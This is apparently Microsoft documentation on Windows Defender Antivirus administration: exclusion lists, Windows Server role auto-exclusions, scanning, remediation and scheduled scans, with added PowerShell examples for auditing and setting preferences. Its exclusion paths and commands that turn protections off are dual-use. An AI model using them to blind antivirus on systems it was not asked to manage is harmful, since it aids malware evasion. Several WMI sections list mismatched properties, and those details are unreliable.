Use: The defined variable will be populated as a path when the exclusion is evaluated
Example use: %ALLUSERSPROFILE%\CustomLogFiles\file.exe
Example matches: Any file opened by C:\ProgramData\CustomLogFiles\file.exe

Review the list of exclusions

You can retrieve the items in the exclusion list with MpCmdRun, PowerShell, System Center Configuration
Manager, Intune, or the Windows Security app.
If you use PowerShell, you can retrieve the list in two ways:
- Retrieve the status of all Windows Defender Antivirus preferences. Each of the lists will be displayed on separate lines, but the items within each list will be combined into the same line.
- Write the status of all preferences to a variable, and use that variable to only call the specific list you are interested in. Each use of Add-MpPreference is written to a new line.

Validate the exclusion list by using MpCmdRun:

To check exclusions with the dedicated command-line tool mpcmdrun.exe, use the following command:

MpCmdRun.exe -CheckExclusion -path <path>

NOTE
Checking exclusions with MpCmdRun requires Windows Defender Antivirus CAMP version 4.18.1812.3 (released in December
2018) or later.

Review the list of exclusions alongside all other Windows Defender Antivirus preferences by using
PowerShell:
Use the following cmdlet:

Get-MpPreference

See Use PowerShell cmdlets to configure and run Windows Defender Antivirus and Defender cmdlets for more
information on how to use PowerShell with Windows Defender Antivirus.
Retrieve a specific exclusions list by using PowerShell:
Use the following code snippet (enter each line as a separate command); replace WDAVprefs with whatever label
you want to name the variable:

$WDAVprefs = Get-MpPreference
$WDAVprefs.ExclusionProcess

See Use PowerShell cmdlets to configure and run Windows Defender Antivirus and Defender cmdlets for more
information on how to use PowerShell with Windows Defender Antivirus.
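
Reviewing the lists is only useful if you know what to look for. The WARNING earlier in this section makes the point: every exclusion lowers the protection Windows Defender Antivirus offers. The function below is an added example (not part of the Microsoft documentation) that dumps all three lists one item per line and flags entries worth a second look, for instance a path exclusion that covers a whole drive or a process exclusion given as a bare file name, which, as the examples table shows, matches a process of that name in any location. The flag rules are constructed heuristics for this example, not Microsoft guidance; adapt them to your environment.

```powershell
# Added example: list every configured exclusion and flag broad or risky entries.
# The heuristics are constructed for this example; tune them to your environment.
function Get-DefenderExclusionReport {
    $prefs = Get-MpPreference
    $lists = @{
        Path      = @($prefs.ExclusionPath      | Where-Object { $_ })
        Extension = @($prefs.ExclusionExtension | Where-Object { $_ })
        Process   = @($prefs.ExclusionProcess   | Where-Object { $_ })
    }

    foreach ($kind in 'Path', 'Extension', 'Process') {
        foreach ($item in $lists[$kind]) {
            $flags = @()
            switch ($kind) {
                'Path' {
                    # A drive root, or a wildcard directly under it, excludes most of the volume.
                    if ($item -match '^[A-Za-z]:\\?(\*.*)?$') { $flags += 'covers a whole drive' }
                    # User-writable locations deserve a closer look than system folders.
                    if ($item -match '^%(USERPROFILE|TEMP|TMP)%|\\Users\\|\\Temp\\') { $flags += 'user-writable location' }
                }
                'Extension' {
                    # Excluding executable or script types by extension is rarely intended.
                    if ($item -match '^\.?(exe|dll|ps1|vbs|js|bat|cmd|scr)$') { $flags += 'executable or script type' }
                }
                'Process' {
                    # A bare file name applies to any process with that name, anywhere on the machine.
                    if ($item -notmatch '\\') { $flags += 'bare name matches any location' }
                    # Files opened by a general-purpose interpreter are effectively unscanned.
                    if ($item -match '\\(powershell|cmd|wscript|cscript|rundll32)\.exe$') { $flags += 'general-purpose interpreter' }
                }
            }
            [pscustomobject]@{ List = $kind; Item = $item; Flags = ($flags -join '; ') }
        }
    }
}

Get-DefenderExclusionReport | Sort-Object List, Item | Format-Table -AutoSize -Wrap
```

Because locally added entries are merged with the lists deployed by Group Policy, Configuration Manager or Intune, the report shows the effective set on this machine rather than only what a given management tool pushed.
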

Related topics
Configure and validate exclusions in Windows Defender Antivirus scans
Configure and validate exclusions based on file name, extension, and folder location
Configure Windows Defender Antivirus exclusions on Windows Server
Customize, initiate, and review the results of Windows Defender Antivirus scans and remediation
Windows Defender Antivirus in Windows 10

Configure Windows Defender Antivirus exclusions on Windows Server
4/8/2019 • 6 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Windows Defender Antivirus on Windows Server 2016 computers automatically enrolls you in certain exclusions,
as defined by your specified server role. See the end of this topic for a list of these exclusions.
These exclusions will not appear in the standard exclusion lists shown in the Windows Security app.
You can still add or remove custom exclusions (in addition to the server role-defined automatic exclusions) as
described in these exclusion-related topics:
Configure and validate exclusions based on file name, extension, and folder location
Configure and validate exclusions for files opened by processes
Custom exclusions take precedence over automatic exclusions.

TIP
Custom and duplicate exclusions do not conflict with automatic exclusions.

Windows Defender Antivirus uses the Deployment Image Servicing and Management (DISM) tools to determine
which roles are installed on your computer.

Opt out of automatic exclusions

In Windows Server 2016, the predefined exclusions delivered by Security intelligence updates only exclude the
default paths for a role or feature. If you installed a role or feature in a custom path, or you want to manually
control the set of exclusions, you need to opt out of the automatic exclusions delivered in Security intelligence
updates.

WARNING
Opting out of automatic exclusions may adversely impact performance, or result in data corruption. The exclusions that are
delivered automatically are optimized for Windows Server 2016 roles.

NOTE
This setting is only supported on Windows Server 2016. While this setting exists in Windows 10, it doesn't have an effect on
exclusions.

TIP
Since the predefined exclusions only exclude default paths, if you move NTDS and SYSVOL to another drive or path different
than the original one, you would have to manually add the exclusions using the information here.

You can disable the automatic exclusion lists with Group Policy, PowerShell cmdlets, and WMI.
Use Group Policy to disable the auto-exclusions list on Windows Server 2016:
1. On your Group Policy management computer, open the Group Policy Management Console, right-click the
Group Policy Object you want to configure and click Edit.
2. In the Group Policy Management Editor go to Computer configuration and click Administrative
templates.
3. Expand the tree to Windows components > Windows Defender Antivirus > Exclusions.
4. Double-click Turn off Auto Exclusions and set the option to Enabled. Click OK.
Use PowerShell cmdlets to disable the auto-exclusions list on Windows Server 2016:
Use the following cmdlets:

Set-MpPreference -DisableAutoExclusions $true

See Use PowerShell cmdlets to configure and run Windows Defender Antivirus and Defender cmdlets for more
information on how to use PowerShell with Windows Defender Antivirus.
Use Windows Management Instrumentation (WMI) to disable the auto-exclusions list on Windows Server
2016:
Use the Set method of the MSFT_MpPreference class for the following properties:

DisableAutoExclusions

See the following for more information and allowed parameters:

Windows Defender WMIv2 APIs

List of automatic exclusions

The following sections contain the exclusions that are delivered with automatic exclusions file paths and file types.
Default exclusions for all roles
This section lists the default exclusions for all Windows Server 2016 roles.
Windows "temp.edb" files:
%windir%\SoftwareDistribution\Datastore\*\tmp.edb
%ProgramData%\Microsoft\Search\Data\Applications\Windows\*\*.log
Windows Update files or Automatic Update files:
%windir%\SoftwareDistribution\Datastore\*\Datastore.edb
%windir%\SoftwareDistribution\Datastore\*\edb.chk
%windir%\SoftwareDistribution\Datastore\*\edb*.log
%windir%\SoftwareDistribution\Datastore\*\Edb*.jrs
%windir%\SoftwareDistribution\Datastore\*\Res*.log
Windows Security files:
%windir%\Security\database\*.chk
%windir%\Security\database\*.edb
%windir%\Security\database\*.jrs
%windir%\Security\database\*.log
%windir%\Security\database\*.sdb
Group Policy files:
%allusersprofile%\NTUser.pol
%SystemRoot%\System32\GroupPolicy\Machine\registry.pol
%SystemRoot%\System32\GroupPolicy\User\registry.pol
WINS files:
%systemroot%\System32\Wins\*\*.chk
%systemroot%\System32\Wins\*\*.log
%systemroot%\System32\Wins\*\*.mdb
%systemroot%\System32\LogFiles\
%systemroot%\SysWow64\LogFiles\
File Replication Service (FRS) exclusions:
Files in the File Replication Service (FRS) working folder. The FRS working folder is specified in the
registry key
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NtFrs\Parameters\Working Directory

%windir%\Ntfrs\jet\sys\*\edb.chk
%windir%\Ntfrs\jet\*\Ntfrs.jdb
%windir%\Ntfrs\jet\log\*\*.log
FRS Database log files. The FRS Database log file folder is specified in the registry key
HKEY_LOCAL_MACHINE\System\Currentcontrolset\Services\Ntfrs\Parameters\DB Log File Directory

%windir%\Ntfrs\*\Edb*.log
The FRS staging folder. The staging folder is specified in the registry key
HKEY_LOCAL_MACHINE\System\Currentcontrolset\Services\NtFrs\Parameters\Replica
Sets\GUID\Replica Set Stage

%systemroot%\Sysvol\*\Nntfrs_cmp*\
The FRS preinstall folder. This folder is specified by the folder
Replica_root\DO_NOT_REMOVE_NtFrs_PreInstall_Directory

%systemroot%\SYSVOL\domain\DO_NOT_REMOVE_NtFrs_PreInstall_Directory\*\Ntfrs*\
The Distributed File System Replication (DFSR) database and working folders. These folders
are specified by the registry key
HKEY_LOCAL_MACHINE\System\Currentcontrolset\Services\DFSR\Parameters\Replication
Groups\GUID\Replica Set Configuration File

NOTE
For custom locations, see Opt out of automatic exclusions.

%systemdrive%\System Volume Information\DFSR\$db_normal$
%systemdrive%\System Volume Information\DFSR\FileIDTable_*
%systemdrive%\System Volume Information\DFSR\SimilarityTable_*
%systemdrive%\System Volume Information\DFSR\*.XML
%systemdrive%\System Volume Information\DFSR\$db_dirty$
%systemdrive%\System Volume Information\DFSR\$db_clean$
%systemdrive%\System Volume Information\DFSR\$db_lostl$
%systemdrive%\System Volume Information\DFSR\Dfsr.db
%systemdrive%\System Volume Information\DFSR\*.frx
%systemdrive%\System Volume Information\DFSR\*.log
%systemdrive%\System Volume Information\DFSR\Fsr*.jrs
%systemdrive%\System Volume Information\DFSR\Tmp.edb
Process exclusions
%systemroot%\System32\dfsr.exe
%systemroot%\System32\dfsrs.exe
Hyper-V exclusions:
This section lists the file type exclusions, folder exclusions, and process exclusions that are delivered
automatically when you install the Hyper-V role
File type exclusions:
*.vhd
*.vhdx
*.avhd
*.avhdx
*.vsv
*.iso
*.rct
*.vmcx
*.vmrs
Folder exclusions:
%ProgramData%\Microsoft\Windows\Hyper-V
%ProgramFiles%\Hyper-V
%SystemDrive%\ProgramData\Microsoft\Windows\Hyper-V\Snapshots
%Public%\Documents\Hyper-V\Virtual Hard Disks
Process exclusions:
%systemroot%\System32\Vmms.exe
%systemroot%\System32\Vmwp.exe
SYSVOL files:
%systemroot%\Sysvol\Domain\*.adm
%systemroot%\Sysvol\Domain\*.admx
%systemroot%\Sysvol\Domain\*.adml
%systemroot%\Sysvol\Domain\Registry.pol
%systemroot%\Sysvol\Domain\*.aas
%systemroot%\Sysvol\Domain\*.inf
%systemroot%\Sysvol\Domain\*.Scripts.ini
%systemroot%\Sysvol\Domain\*.ins
%systemroot%\Sysvol\Domain\Oscfilter.ini
Active Directory exclusions
This section lists the exclusions that are delivered automatically when you install Active Directory Domain Services.
NTDS database files. The database files are specified in the registry key
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NTDS\Parameters\DSA Database File

%windir%\Ntds\ntds.dit
%windir%\Ntds\ntds.pat
The AD DS transaction log files. The transaction log files are specified in the registry key
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NTDS\Parameters\Database Log Files

%windir%\Ntds\EDB*.log
%windir%\Ntds\Res*.log
%windir%\Ntds\Edb*.jrs
%windir%\Ntds\Ntds*.pat
%windir%\Ntds\EDB*.log
%windir%\Ntds\TEMP.edb
The NTDS working folder. This folder is specified in the registry key
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NTDS\Parameters\DSA Working Directory

%windir%\Ntds\Temp.edb
%windir%\Ntds\Edb.chk
Process exclusions for AD DS and AD DS-related support files:
%systemroot%\System32\ntfrs.exe
%systemroot%\System32\lsass.exe
DHCP Server exclusions
This section lists the exclusions that are delivered automatically when you install the DHCP Server role. The DHCP
Server file locations are specified by the DatabasePath, DhcpLogFilePath, and BackupDatabasePath parameters in
the registry key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DHCPServer\Parameters
%systemroot%\System32\DHCP\*\*.mdb
%systemroot%\System32\DHCP\*\*.pat
%systemroot%\System32\DHCP\*\*.log
%systemroot%\System32\DHCP\*\*.chk
%systemroot%\System32\DHCP\*\*.edb
DNS Server exclusions
This section lists the file and folder exclusions and the process exclusions that are delivered automatically when you
install the DNS Server role.
File and folder exclusions for the DNS Server role:
%systemroot%\System32\Dns\*\*.log
%systemroot%\System32\Dns\*\*.dns
%systemroot%\System32\Dns\*\*.scc
%systemroot%\System32\Dns\*\BOOT
Process exclusions for the DNS Server role:
%systemroot%\System32\dns.exe
File and Storage Services exclusions
This section lists the file and folder exclusions that are delivered automatically when you install the File and Storage
Services role. The exclusions listed below do not include exclusions for the Clustering role.
%SystemDrive%\ClusterStorage
%clusterserviceaccount%\Local Settings\Temp
%SystemDrive%\mscs
Print Server exclusions
This section lists the file type exclusions, folder exclusions, and the process exclusions that are delivered
automatically when you install the Print Server role.
File type exclusions:
*.shd
*.spl
Folder exclusions. This folder is specified in the registry key
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Printers\DefaultSpoolDirectory

%system32%\spool\printers\*
Process exclusions:
spoolsv.exe
Web Server exclusions
This section lists the folder exclusions and the process exclusions that are delivered automatically when you install
the Web Server role.
Folder exclusions:
%SystemRoot%\IIS Temporary Compressed Files
%SystemDrive%\inetpub\temp\IIS Temporary Compressed Files
%SystemDrive%\inetpub\temp\ASP Compiled Templates
%systemDrive%\inetpub\logs
%systemDrive%\inetpub\wwwroot
Process exclusions:
%SystemRoot%\system32\inetsrv\w3wp.exe
%SystemRoot%\SysWOW64\inetsrv\w3wp.exe
%SystemDrive%\PHP5433\php-cgi.exe
Windows Server Update Services exclusions
This section lists the folder exclusions that are delivered automatically when you install the Windows Server Update
Services (WSUS) role. The WSUS folder is specified in the registry key
HKEY_LOCAL_MACHINE\Software\Microsoft\Update Services\Server\Setup

%systemroot%\WSUS\WSUSContent
%systemroot%\WSUS\UpdateServicesDBFiles
%systemroot%\SoftwareDistribution\Datastore
%systemroot%\SoftwareDistribution\Download

Related topics
Configure and validate exclusions for Windows Defender Antivirus scans
Configure and validate exclusions based on file name, extension, and folder location
Configure and validate exclusions for files opened by processes
Customize, initiate, and review the results of Windows Defender Antivirus scans and remediation
Windows Defender Antivirus in Windows 10
Configure Windows Defender Antivirus scanning options
4/5/2019 • 3 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Use Microsoft Intune to configure scanning options
See Configure device restriction settings in Microsoft Intune and Windows Defender Antivirus device restriction settings for
Windows 10 in Intune for more details.
Use Configuration Manager to configure scanning options:
See How to create and deploy antimalware policies: Scan settings for details on configuring System Center Configuration
Manager (current branch).
Use Group Policy to configure scanning options
To configure the Group Policy settings described in the following table:
1. On your Group Policy management computer, open the Group Policy Management Console, right-click the Group Policy
Object you want to configure and click Edit.
2. In the Group Policy Management Editor go to Computer configuration and click Administrative templates.
3. Expand the tree to Windows components > Windows Defender Antivirus and then the Location specified in the
table below.
4. Double-click the policy Setting as specified in the table below, and set the option to your desired configuration. Click OK,
and repeat for any other settings.

DESCRIPTION | LOCATION AND SETTING | DEFAULT SETTING (IF NOT CONFIGURED) | POWERSHELL SET-MPPREFERENCE PARAMETER OR WMI PROPERTY FOR MSFT_MPPREFERENCE CLASS
Email scanning (see Email scanning limitations below) | Scan > Turn on e-mail scanning | Disabled | -DisableEmailScanning
Scan reparse points | Scan > Turn on reparse point scanning | Disabled | Not available
Scan mapped network drives | Scan > Run full scan on mapped network drives | Disabled | -DisableScanningMappedNetworkDrivesForFullSca
Scan archive files (such as .zip or .rar files). The extensions exclusion list will take precedence over this setting. | Scan > Scan archive files | Enabled | -DisableArchiveScanning
Scan files on the network | Scan > Scan network files | Disabled | -DisableScanningNetworkFiles
Scan packed executables | Scan > Scan packed executables | Enabled | Not available
Scan removable drives during full scans only | Scan > Scan removable drives | Disabled | -DisableRemovableDriveScanning
Specify the level of subfolders within an archive folder to scan | Scan > Specify the maximum depth to scan archive files | 0 | Not available
Specify the maximum CPU load (as a percentage) during a scan. Note: This is not a hard limit but rather a guidance for the scanning engine to not exceed this maximum on average. | Scan > Specify the maximum percentage of CPU utilization during a scan | 50 | -ScanAvgCPULoadFactor
Specify the maximum size (in kilobytes) of archive files that should be scanned. The default, 0, applies no limit. | Scan > Specify the maximum size of archive files to be scanned | No limit | Not available
Configure low CPU priority for scheduled scans | Scan > Configure low CPU priority for scheduled scans | Disabled | Not available

NOTE
If real-time protection is enabled, files are scanned before they are accessed and executed. The scanning scope includes all files, including
those on mounted removable devices such as USB drives.

Use PowerShell to configure scanning options


See Manage Windows Defender Antivirus with PowerShell cmdlets and Defender cmdlets for more information on how to use
PowerShell with Windows Defender Antivirus.
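An added example, not part of the Microsoft documentation, that applies several of the Set-MpPreference parameters from the table above and then verifies them with Get-MpPreference. The target values are the example's own choices, and it assumes an elevated PowerShell session on an endpoint running Windows Defender Antivirus.

```powershell
# Added example (not from the Microsoft documentation): apply a chosen set of the scanning
# options listed in the table above with Set-MpPreference, then read the effective values
# back with Get-MpPreference. Requires an elevated PowerShell session on an endpoint running
# Windows Defender Antivirus; the target values below are this example's own choices.

$desired = [ordered]@{
    DisableArchiveScanning        = $false   # do scan .zip/.rar (extension exclusions still take precedence)
    DisableRemovableDriveScanning = $false   # include removable drives in full scans
    DisableScanningNetworkFiles   = $true    # documented default: leave network files to the file server's AV
    DisableEmailScanning          = $true    # documented default: rely on real-time protection for mail
    ScanAvgCPULoadFactor          = 50       # average CPU ceiling in percent (guidance, not a hard limit)
}

# Snapshot the current preferences so every change is recorded with its previous value.
$before  = Get-MpPreference
$changes = foreach ($name in $desired.Keys) {
    $current = $before.$name
    if ($current -ne $desired[$name]) {
        $param = @{ $name = $desired[$name] }
        Set-MpPreference @param          # splat a single parameter by name
        [pscustomobject]@{ Setting = $name; Was = $current; Now = $desired[$name] }
    }
}
$changes | Format-Table -AutoSize

# Verify. A value that did not take effect usually means the setting is enforced by
# Group Policy or Intune, which take precedence over local Set-MpPreference changes.
$after = Get-MpPreference
foreach ($name in $desired.Keys) {
    if ($after.$name -ne $desired[$name]) {
        Write-Warning "$name is $($after.$name), expected $($desired[$name]); check for a managed (Group Policy / Intune) policy."
    }
}
```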
Use WMI to configure scanning options
For using WMI classes, see Windows Defender WMIv2 APIs.
Email scanning limitations
We recommend using always-on real-time protection to protect against email-based malware.
Always-on protection scans emails as they arrive and as they are manipulated, just like normal files in the operating system. This
provides the strongest form of protection and is the recommended setting for scanning emails.
You can also use this Group Policy to enable scanning of older email files used by Outlook 2003 and older during on-demand
and scheduled scans. Embedded objects within an email file (such as attachments and archived files) are also scanned. The
following file format types can be scanned and remediated:
DBX
MBX
MIME
PST files used by Outlook 2003 or older (where the archive type is set to non-unicode) can also be scanned, but Windows
Defender cannot remediate threats detected inside PST files. This is another reason why we recommend using always-on
real-time protection to protect against email-based malware.
If Windows Defender Antivirus detects a threat inside an email, it will show you the following information to assist you in
identifying the compromised email, so you can remediate the threat:
Email subject
Attachment name
WARNING
There are some risks associated with scanning some Microsoft Outlook files and email messages. You can read about tips and risks
associated with scanning Outlook files and email messages in the following articles:
Scanning Outlook files in Outlook 2013
Scanning email messages in Outlook 2013

Related topics
Customize, initiate, and review the results of Windows Defender Antivirus scans and remediation
Configure and run on-demand Windows Defender Antivirus scans
Configure scheduled Windows Defender Antivirus scans
Windows Defender Antivirus in Windows 10
Configure remediation for Windows Defender
Antivirus scans
4/5/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
When Windows Defender Antivirus runs a scan, it will attempt to remediate or remove threats that it finds. You can
configure how Windows Defender Antivirus should react to certain threats, whether it should create a restore point
before remediating, and when it should remove remediated threats.
This topic describes how to configure these settings with Group Policy, but you can also use System Center
Configuration Manager and Microsoft Intune.
You can also use the Set-MpPreference PowerShell cmdlet or MSFT_MpPreference WMI class to configure these
settings.

Configure remediation options


You can configure how remediation works with the Group Policy settings described in this section.
To configure these settings:
1. On your Group Policy management computer, open the Group Policy Management Console, right-click the
Group Policy Object you want to configure and click Edit.
2. In the Group Policy Management Editor go to Computer configuration and click Administrative
templates.
3. Expand the tree to Windows components > Windows Defender Antivirus and then the Location
specified in the table below.
4. Double-click the policy Setting as specified in the table below, and set the option to your desired
configuration. Click OK, and repeat for any other settings.

LOCATION | SETTING | DESCRIPTION | DEFAULT SETTING (IF NOT CONFIGURED)
Scan | Create a system restore point | A system restore point will be created each day before cleaning or scanning is attempted | Disabled
Scan | Turn on removal of items from scan history folder | Specify how many days items should be kept in the scan history | 30 days
Root | Turn off routine remediation | You can specify whether Windows Defender Antivirus automatically remediates threats, or if it should ask the endpoint user what to do. | Disabled (threats are remediated automatically)
Quarantine | Configure removal of items from Quarantine folder | Specify how many days items should be kept in quarantine before being removed | Never removed
Threats | Specify threat alert levels at which default action should not be taken when detected | Every threat that is detected by Windows Defender Antivirus is assigned a threat level (low, medium, high, or severe). You can use this setting to define how all threats for each of the threat levels should be remediated (quarantined, removed, or ignored) | Not applicable
Threats | Specify threats upon which default action should not be taken when detected | Specify how specific threats (using their threat ID) should be remediated. You can specify whether the specific threat should be quarantined, removed, or ignored | Not applicable

IMPORTANT
Windows Defender Antivirus detects and remediates files based on many factors. Sometimes, completing a remediation
requires a reboot. Even if the detection is later determined to be a false positive, the reboot must be completed to ensure all
additional remediation steps have been completed.
If you are certain Windows Defender Antivirus quarantined a file based on a false positive, you can restore the file from
quarantine after the device reboots. See Restore quarantined files in Windows Defender Antivirus.
To avoid this problem in the future, you can exclude files from the scans. See Configure and validate exclusions for Windows
Defender Antivirus scans.

Also see Configure remediation-required scheduled full Windows Defender Antivirus scans for more
remediation-related settings.
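An added example, not part of the Microsoft documentation, that expresses the remediation settings from the table above through the Set-MpPreference cmdlet and reads them back with Get-MpPreference. It assumes an elevated session; the retention periods and default actions are the example's own choices, and the threat ID used for the per-threat override is an example value to be confirmed against Get-MpThreatCatalog.

```powershell
# Added example (not from the Microsoft documentation): the remediation settings in the table
# above, applied with Set-MpPreference and read back with Get-MpPreference. Requires an
# elevated session. The ThreatID used for the per-threat override is an example value; confirm
# any ID against Get-MpThreatCatalog before relying on it.

$policy = @{
    DisableRestorePoint            = $false        # "Create a system restore point" before cleaning/scanning
    ScanPurgeItemsAfterDelay       = 30            # days to keep scan history (documented default: 30)
    QuarantinePurgeItemsAfterDelay = 90            # days to keep quarantined items (documented default: never removed)
    # Default action per threat level. Allowed values: Clean, Quarantine, Remove, Allow,
    # UserDefined, NoAction, Block. Quarantine preserves the sample for incident response.
    LowThreatDefaultAction         = 'Quarantine'
    ModerateThreatDefaultAction    = 'Quarantine'
    HighThreatDefaultAction        = 'Quarantine'
    SevereThreatDefaultAction      = 'Quarantine'
}
Set-MpPreference @policy

# Per-threat override (the second "Threats" row): one action per ThreatID, in the same order.
# Look IDs up by name in the local threat catalogue, for example:
#   Get-MpThreatCatalog | Where-Object ThreatName -like '*EICAR*' | Select-Object ThreatID, ThreatName
$ids     = @(2147519003)     # EXAMPLE ThreatID; verify with Get-MpThreatCatalog
$actions = @('Remove')
Set-MpPreference -ThreatIDDefaultAction_Ids $ids -ThreatIDDefaultAction_Actions $actions

# Read back. Get-MpPreference reports the actions numerically:
# 1 Clean, 2 Quarantine, 3 Remove, 6 Allow, 8 UserDefined, 9 NoAction, 10 Block.
Get-MpPreference | Select-Object DisableRestorePoint, ScanPurgeItemsAfterDelay,
    QuarantinePurgeItemsAfterDelay, LowThreatDefaultAction, ModerateThreatDefaultAction,
    HighThreatDefaultAction, SevereThreatDefaultAction,
    ThreatIDDefaultAction_Ids, ThreatIDDefaultAction_Actions | Format-List
```

Settings enforced by Group Policy or Intune take precedence over these local values, so a read-back that does not match is the first sign that a managed policy is in effect.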

Related topics
Configure Windows Defender Antivirus scanning options
Configure scheduled Windows Defender Antivirus scans
Configure and run on-demand Windows Defender Antivirus scans
Configure the notifications that appear on endpoints
Configure end-user Windows Defender Antivirus interaction
Customize, initiate, and review the results of Windows Defender Antivirus scans and remediation
Windows Defender Antivirus in Windows 10
Configure scheduled quick or full Windows Defender
Antivirus scans
4/8/2019 • 6 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)

NOTE
By default, Windows Defender Antivirus checks for an update 15 minutes before the time of any scheduled scans. You can
Manage the schedule for when protection updates should be downloaded and applied to override this default.

In addition to always-on real-time protection and on-demand scans, you can set up regular, scheduled scans.
You can configure the type of scan, when the scan should occur, and if the scan should occur after a protection
update or if the endpoint is being used. You can also specify when special scans to complete remediation should
occur.
This topic describes how to configure scheduled scans with Group Policy, PowerShell cmdlets, and WMI. You can
also configure scheduled scans with System Center Configuration Manager or Microsoft Intune.
To configure the Group Policy settings described in this topic:
1. On your Group Policy management machine, open the Group Policy Management Console, right-click the
Group Policy Object you want to configure and click Edit.
2. In the Group Policy Management Editor go to Computer configuration.
3. Click Administrative templates.
4. Expand the tree to Windows components > Windows Defender Antivirus and then the Location
specified in the table below.
5. Double-click the policy Setting as specified in the table below, and set the option to your desired
configuration. Click OK, and repeat for any other settings.
Also see the Manage when protection updates should be downloaded and applied and Prevent or allow users to
locally modify policy settings topics.

Quick scan versus full scan and custom scan


When you set up scheduled scans, you can set up whether the scan should be a full or quick scan.
Quick scans look at all the locations where there could be malware registered to start with the system, such as
registry keys and known Windows startup folders.
Combined with always-on real-time protection capability - which reviews files when they are opened and closed,
and whenever a user navigates to a folder - a quick scan helps provide strong coverage both for malware that starts
with the system and kernel-level malware.
In most instances, this means a quick scan is adequate to find malware that wasn't picked up by real-time
protection.
A full scan can be useful on endpoints that have encountered a malware threat to identify if there are any inactive
components that require a more thorough clean-up. In this instance, you may want to use a full scan when running
an on-demand scan.
A custom scan allows you to specify the files and folders to scan, such as a USB drive.

NOTE
By default, quick scans run on mounted removable devices, such as USB drives.

Set up scheduled scans


Scheduled scans will run at the day and time you specify. You can use Group Policy, PowerShell, and WMI to
configure scheduled scans.

NOTE
If a computer is unplugged and running on battery during a scheduled full scan, the scheduled scan will stop with event
1002, which states that the scan stopped before completion. Windows Defender Antivirus will run a full scan at the next
scheduled time.

Use Group Policy to schedule scans:

LOCATION | SETTING | DESCRIPTION | DEFAULT SETTING (IF NOT CONFIGURED)
Scan | Specify the scan type to use for a scheduled scan | | Quick scan
Scan | Specify the day of the week to run a scheduled scan | Specify the day (or never) to run a scan. | Never
Scan | Specify the time of day to run a scheduled scan | Specify the number of minutes after midnight (for example, enter 60 for 1 am). | 2 am
Root | Randomize scheduled task times | In Windows Defender Antivirus: Randomize the start time of the scan to any interval from 0 to 4 hours. In FEP/SCEP: randomize to any interval plus or minus 30 minutes. This can be useful in VM or VDI deployments. | Enabled

Use PowerShell cmdlets to schedule scans:


Use the following cmdlets:

Set-MpPreference -ScanParameters
Set-MpPreference -ScanScheduleDay
Set-MpPreference -ScanScheduleTime
Set-MpPreference -RandomizeScheduleTaskTimes

See Use PowerShell cmdlets to configure and run Windows Defender Antivirus and Defender cmdlets for more
information on how to use PowerShell with Windows Defender Antivirus.
Use Windows Management Instrumentation (WMI) to schedule scans:
Use the Set method of the MSFT_MpPreference class for the following properties:

SignatureFallbackOrder
SignatureDefinitionUpdateFileSharesSouce

See the following for more information and allowed parameters:


Windows Defender WMIv2 APIs

Start scheduled scans only when the endpoint is not in use


You can set the scheduled scan to only occur when the endpoint is turned on but not in use with Group Policy,
PowerShell, or WMI.
Use Group Policy to schedule scans

LOCATION | SETTING | DESCRIPTION | DEFAULT SETTING (IF NOT CONFIGURED)
Scan | Start the scheduled scan only when computer is on but not in use | Scheduled scans will not run, unless the computer is on but not in use | Enabled

Use PowerShell cmdlets:


Use the following cmdlets:

Set-MpPreference -ScanOnlyIfIdleEnabled

See Use PowerShell cmdlets to configure and run Windows Defender Antivirus and Defender cmdlets for more
information on how to use PowerShell with Windows Defender Antivirus.
Use Windows Management Instrumentation (WMI):
Use the Set method of the MSFT_MpPreference class for the following properties:

SignatureFallbackOrder
SignatureDefinitionUpdateFileSharesSouce

See the following for more information and allowed parameters:


Windows Defender WMIv2 APIs

Configure when full scans should be run to complete remediation


Some threats may require a full scan to complete their removal and remediation. You can schedule when these
scans should occur with Group Policy, PowerShell, or WMI.
Use Group Policy to schedule remediation-required scans
LOCATION | SETTING | DESCRIPTION | DEFAULT SETTING (IF NOT CONFIGURED)
Remediation | Specify the day of the week to run a scheduled full scan to complete remediation | Specify the day (or never) to run a scan. | Never
Remediation | Specify the time of day to run a scheduled full scan to complete remediation | Specify the number of minutes after midnight (for example, enter 60 for 1 am) | 2 am

Use PowerShell cmdlets:


Use the following cmdlets:

Set-MpPreference -RemediationScheduleDay
Set-MpPreference -RemediationScheduleTime

See Use PowerShell cmdlets to configure and run Windows Defender Antivirus and Defender cmdlets for more
information on how to use PowerShell with Windows Defender Antivirus.
Use Windows Management Instrumentation (WMI):
Use the Set method of the MSFT_MpPreference class for the following properties:

SignatureFallbackOrder
SignatureDefinitionUpdateFileSharesSouce

See the following for more information and allowed parameters:


Windows Defender WMIv2 APIs

Set up daily quick scans


You can enable a daily quick scan that can be run in addition to your other scheduled scans with Group Policy,
PowerShell, or WMI.
Use Group Policy to schedule daily scans:

LOCATION | SETTING | DESCRIPTION | DEFAULT SETTING (IF NOT CONFIGURED)
Scan | Specify the interval to run quick scans per day | Specify how many hours should elapse before the next quick scan. For example, to run every two hours, enter 2, for once a day, enter 24. Enter 0 to never run a daily quick scan. | Never
Scan | Specify the time for a daily quick scan | Specify the number of minutes after midnight (for example, enter 60 for 1 am) | 2 am

Use PowerShell cmdlets to schedule daily scans:


Use the following cmdlets:
Set-MpPreference -ScanScheduleQuickTime

See Use PowerShell cmdlets to configure and run Windows Defender Antivirus and Defender cmdlets for more
information on how to use PowerShell with Windows Defender Antivirus.
Use Windows Management Instrumentation (WMI) to schedule daily scans:
Use the Set method of the MSFT_MpPreference class for the following properties:

SignatureFallbackOrder
SignatureDefinitionUpdateFileSharesSouce

See the following for more information and allowed parameters:


Windows Defender WMIv2 APIs

Enable scans after protection updates


You can force a scan to occur after every protection update with Group Policy.
Use Group Policy to schedule scans after protection updates

LOCATION | SETTING | DESCRIPTION | DEFAULT SETTING (IF NOT CONFIGURED)
Signature updates | Turn on scan after Security intelligence update | A scan will occur immediately after a new protection update is downloaded | Enabled
